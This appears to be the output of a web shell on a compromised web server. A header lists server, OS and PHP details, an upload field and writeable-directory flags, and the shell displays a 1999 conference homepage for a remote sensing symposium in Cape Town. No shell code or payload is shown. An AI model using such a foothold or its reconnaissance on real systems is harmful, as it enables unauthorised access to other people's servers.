KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/icrse/capetown/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/icrse/capetown/home.html
<html>
<head>
<title>ISRSE in Cape Town</title>
<!-- html by JC van Vuuren 99-03-15 WebCatz cc-->
<mega name="description" content="28th International Symposium on Remote Sensing of Environment,">
<meta name="keywords" content="Symposium, Environment, Remote Sensing, First call for Papers, Cape Town, Growth and Development, Satellite Applications Centre, Koeberg, Conference,">

<style type="text/css">
<!--div.today {
        font-family: Lucida Sans Unicode, Arial, Verdana;
        font-size: 9pt;
        line-height: 12pt; }
-->
</style>

<SCRIPT language=javascript>

  <!--
  /*  Your are permitted to reuse this code as long as the following copyright
      notice is not removed:

      This HTML tip handling is copyright 1998 by insideDHTML.com, LLC. More information about this
      code can be found at Inside Dynamic HTML: HTTP://www.insideDHTML.com
  */


  // Support for all collection
  var allSupport = document.all!=null

  function setupEventObject(e) {
    // Map NS event object to IEs
    if (e==null) return // IE returns
    window.event = e
    window.event.fromElement = e.target
    window.event.toElement = e.target
    window.event.srcElement = e.target
    window.event.x = e.x
    window.event.y = e.y
    // Route the event to the original element
    // Necessary to make sure _tip is set.
    window.event.srcElement.handleEvent(e);
  }


  function checkName(src) {
    // Look for tooltip in IE
    while ((src!=null) && (src._tip==null))
      src = src.parentElement
    return src
  }

  function getElement(elName) {
    // Get an element from its ID
    if (allSupport)
      return document.all[elName]
    else
      return document.layers[elName]
  }

  function writeContents(el, tip) {
    // Replace the contents of the tooltip
    if (allSupport)
      el.innerHTML = tip
    else {
      // In NS, insert a table to work around
      // stylesheet rendering bug.
      // NS fails to apply style sheets when writing
      // contents into a positioned element.
      el.document.open()
      el.document.write("<TABLE WIDTH=300 BORDER=2 bordercolor=white><TR><TD WIDTH=100% BGCOLOR=#F5D7A9>")
      el.document.write(tip)
      el.document.write("</TD></TR></TABLE>")
      el.document.close()
    }
  }

  function getOffset(el, which) {
    // Function for IE to calculate position
    // of an element.
    var amount = el["offset"+which]
    if (which=="Top")
      amount+=el.offsetHeight
    el = el.offsetParent
    while (el!=null) {
      amount+=el["offset"+which]
      el = el.offsetParent
    }
    return amount
  }


  function setPosition(el) {
    // Set the position of an element
    src = window.event.srcElement
    if (allSupport) {
      el.style.pixelTop = getOffset(src, "Top")
      el.style.pixelLeft = getOffset(src, "Left")
    } else
    {
      el.top = src.y + 20 //window.event.y + 15
      el.left = src.x //window.event.x
    }
  }

  function setVisibility(el, bDisplay) {
    // Hide or show to tip
    if (bDisplay)
      if (allSupport)
        el.style.visibility = "visible"
      else
        el.visibility = "show";
    else
      if (allSupport)
        el.style.visibility = "hidden"
      else
        el.visibility = "hidden"
  }


  function displayContents(tip) {
    // Display the tooltip.
    var el = getElement("tipBox")
    writeContents(el, tip)
    setPosition(el)
    setVisibility(el, true)
  }


  function doMouseOver(e) {
    // Mouse moves over an element
    setupEventObject(e)
    var el, tip
    if ((el = checkName(window.event.srcElement))!=null)
      if  (!el._display) {
        displayContents(el._tip)
        el._display = true
      }
  }

  function doMouseOut(e) {
    // Mouse leaves an element
    setupEventObject(e)
    el = checkName(window.event.srcElement)
    var el, tip
    if ((el = checkName(window.event.srcElement))!=null)
      if (el._display)
        if ((el.contains==null) || (!el.contains(window.event.toElement))) {
          setVisibility(getElement("tipBox"), false)
          el._display = false
        }
  }

  function doLoad() {
    // Do Loading
    if ((window.document.captureEvents==null) && (!allSupport))
      return // Not IE4 or NS4
    if (window.document.captureEvents!=null)  // NS - capture events
      window.document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)
    window.document.onmouseover = doMouseOver;
    window.document.onmouseout = doMouseOut;
  }

  window.onload = doLoad
  // -->

</SCRIPT>

<STYLE>
  <!--
  #tipBox {position: absolute; width: 300px; z-index: 300;border: 2pt white solid; background: #F5D7A9; visibility: hidden}
  -->
</STYLE>



</head>

<body bgcolor="#FFF4E1" text="#000000" width="1110" height="600">


<table border="0" cellpadding="0" cellspacing="0" width="640">
    <tr>

<td valign="top"><img src="/capetown/images/yellowleft.gif" width="136" height="28"  border="0">
<br><br>
<a href="http://www.geoplace.com">
<img border="0" src="/capetown/images/geosmall.gif" width="162" height="32" ALT="Geoplace.com The World's Leading Provider of Geospatial Information"></a>
</td>


<td align="right" valign="top">
<img src="/capetown/images/ct2000.gif" width="250" height="32" ALT="Cape Town 2000">
<br></td>
</tr>

<tr>
<td align="left">
<br>
<a href="/capetown/proginfo.html">
<img border="0" src="/capetown/images/animation3.gif" width="250" height="32" ALT="Technical Programme now live!"></a>
</td>


<td align="right">
<br>
<img src="/capetown/images/toplogo4.gif"
width="385" height="70"
alt="28th ISRSE in Cape Town
General Info on SA
Quality Links to Cape Town Sites
Maps of Cape Town and surrounds">
</td>
</tr>

<tr>
<td colspan="2">
<img src="/capetown/images/mainlogo10.jpg" width="700" height="140 ALT="It's a symposium which has, since was first convened in 1962, contributed enormously to the advancement of knowledge remote sensing."></td>

</tr>
</table>



<table width="640" border="0" cellpadding="0" cellspacing="0"
><tr>

<td width="152" align="right" valign="top">

<img src="/capetown/images/28logo.gif" width="167" height="68" alt="The 28th International Symposium on Remote Sensing of Environment">
<br>


<img src="/capetown/images/aarslogo.gif" width="120" height="150" alt="African Association of Remote Sensing of the Environment">
<br><br>

<a href="http://www.sac.co.za">
<img src="/capetown/images/csirlogo.gif" width="152" height="80" border="0" alt="The CSIR Satellite Applications Centre and Host Organiser of the 28th International Symposium on Remote Sensing of Environment"></a>


</td>
<td width="2" bgcolor="#000000"><img src="/capetown/images/lineleft.gif"></td>
<td width="290" valign="top" align="left">
<div class=today>




<br>
<img src="/capetown/images/pointer3.gif" width="24" height="12"><a href="/capetown/venue.html"   ONMOUSEOVER="this._tip='<li>Venue<li>General info on SA<li>Quality links to Cape Town Sites<li>Maps of Cape Town and surrounds'">Cape Town</a>
<br>

<div class=today>
<img src="/capetown/images/pointer3.gif" width="24" height="12"><a href="/capetown/call.html"    ONMOUSEOVER="this._tip='<li>Symposium Announcement and Details on Paper and Abstracts'">Call for Papers</a>
<br>

<div class=today>
<img src="/capetown/images/pointer3.gif" width="24" height="12"><a href="/capetown/organisers.html"    ONMOUSEOVER="this._tip='<li>28th ISRSE Organising Committee<li>28th ISRSE Technical Committee<li>International Centre for Remote Sensing of Environment'">Organisers</a>
<br>

<!--<div class=today>
<img src="images/pointer3.gif" width="24" height="12">Author's Kit</a>
<br>-->

<div class=today>
<img src="/capetown/images/pointer3.gif" width="24" height="12"><a href="/capetown/proginfo.html"    ONMOUSEOVER="this._tip='<li>Preliminary Technical Programme'">Programme Info</a>
<br>

<div class=today>
<img src="/capetown/images/pointer3.gif" width="24" height="12"><a href="/capetown/travinfo.html"
ONMOUSEOVER="this._tip='<li>General<li>Transport'">Travel Info</a>
<br>

<div class=today>
<img src="/capetown/images/pointer3.gif" width="24" height="12"><a href="/capetown/accom.html"
ONMOUSEOVER="this._tip='<li>General<li>Accommodation Option<li>Deposits and Cancellations'">Accommodation</a>
<br>

<div class=today>
<img src="/capetown/images/pointer3.gif" width="24" height="12">
<a href="/capetown/register.html"
ONMOUSEOVER="this._tip='<li>Pricing Information'">Pricing</a>
<br>

<div class=today>
<img src="/capetown/images/pointer3.gif" width="24" height="12"><a href="/capetown/register.html"
ONMOUSEOVER="this._tip='<li>General<li>Registration Fees<li>Procedures<li>Policy'">Registration</a> <br>

<!--<div class=today>
<img src="/capetown/images/pointer3.gif" width="24" height="12">Proceedings</a>
<br>-->

<div class=today>
<img src="/capetown/images/pointer3.gif" width="24" height="12"><a href="/capetown/social.html"
ONMOUSEOVER="this._tip='<li>The official Cape Town 2000 Function<li>Icebreaker Event<li>Cape Town for the night owls<li>Cape Cultural Evening'">Social Events</a>
<br>

<div class=today>
<img src="/capetown/images/pointer3.gif" width="24" height="12"><a href="/capetown/persons.html"
ONMOUSEOVER="this._tip='<li>Tour A:Cape Town & Table Mountain<li>Tour B:Cape Winelands<li>Tour C:The Helderberg & Southern Coastline<li>Tour D : Full Day Tour of Cape Peninsula'">Companions</a>
<br>

<!--<div class=today>
<img src="images/pointer3.gif" width="24" height="12">Technical Tours</a>
<br>-->

<div class=today>
<img src="/capetown/images/pointer3.gif" width="24" height="12"><a href="/capetown/exhibition.html"
ONMOUSEOVER="this._tip='<li>Why exhibit at Cape Town 2000?<li>Previous exhibitors include<li>Full Stand<li>Costs<li>Dates'">Exhibition</a>
<br>

<div class=today>
<img src="/capetown/images/pointer3.gif" width="24" height="12"><a href="/capetown/sponsors.html"
ONMOUSEOVER="this._tip='<li>Call for sponsors<li>One gold sponsorship<li>Other Sponsorship opportunities'">Sponsors</a>
</div>
</div></div></div></div></div></div></div></div></div></div></div></td>

<td valign="top">
<!--TEXT IMAGE FOR MAIN PAGE-->

<table border="0" cellpadding="0" cellspacing="0" width="300">
    <tr>

<td align="right">
<br>
<div class=today>

<center>
<table border="2" bordercolor="red">
<tr>
<td align="center"><div class=today><a href="/capetown/proginfo/order.html"><font color="red">Order your hardcopy of the Preliminary Programme Now!</font></a></div></td>
</tr>
</table>

<p>

Thank you to contributors from all corners of the world who have submitted abstracts on their activities in the field of remote sensing of the environment. Not only did the number of abstracts exceed expectations, but the Committee believes it has managed to put together a technical programme of good quality.
<p>

<a href="/capetown/proginfo.html">The Preliminary Technical Programme</a> and other information around the symposium has now been added. For your convenience an electronic ordering form for hard copies of the programme has also been created - please inform colleagues and industry peers of this facility.
<p>

Also note that a significant Early Bird discount is available should you register before 15 December 1999.
<p>

Hope to see you at Cape Town 2000 in March 2000.

</center>
</div>
</td>
</tr>
</table>
</td>



</tr>
</table>

<hr size="2" width="640">


<table border=0 width="640">
<tr>
<td align="center">
<a href="mailto:[email protected]"><img border=0 src="/capetown/images/feedback.gif" width="140" height="47"></a>

</td>

<!--<td align="center">
<a href="index.html"><img border=0 src="images/back.gif" width="95" height="47"></a>
</center>
</td>-->

<td align="center">
<a href="/capetown/sitemap.html"><img border=0 src="/capetown/images/sitemap.gif" width="128" height="52"></a>

</td>

</tr>
</table>


<br>
<hr size="2" width="640">

<div class=today>
<center>Published by:<br>
        28th International Symposium on Remote Sensing of Environment Webservice. <br>Copyright � 1999 ISRSE
        Web Service.<br>
<a href="mailto:[email protected]">Webmaster</a><br>
<!--<a href="/capetown/committee/closed.html">Committee Members</a>-->
<br>

</center>


<DIV ID=tipBox>
</DIV>
</div>
</body>
</html>

Anon7 - 2021